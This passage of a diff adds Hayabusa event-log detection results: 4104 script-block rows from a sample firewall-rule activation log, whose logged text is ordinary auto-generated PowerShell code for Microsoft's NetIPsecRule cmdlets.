[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters,",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters,",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 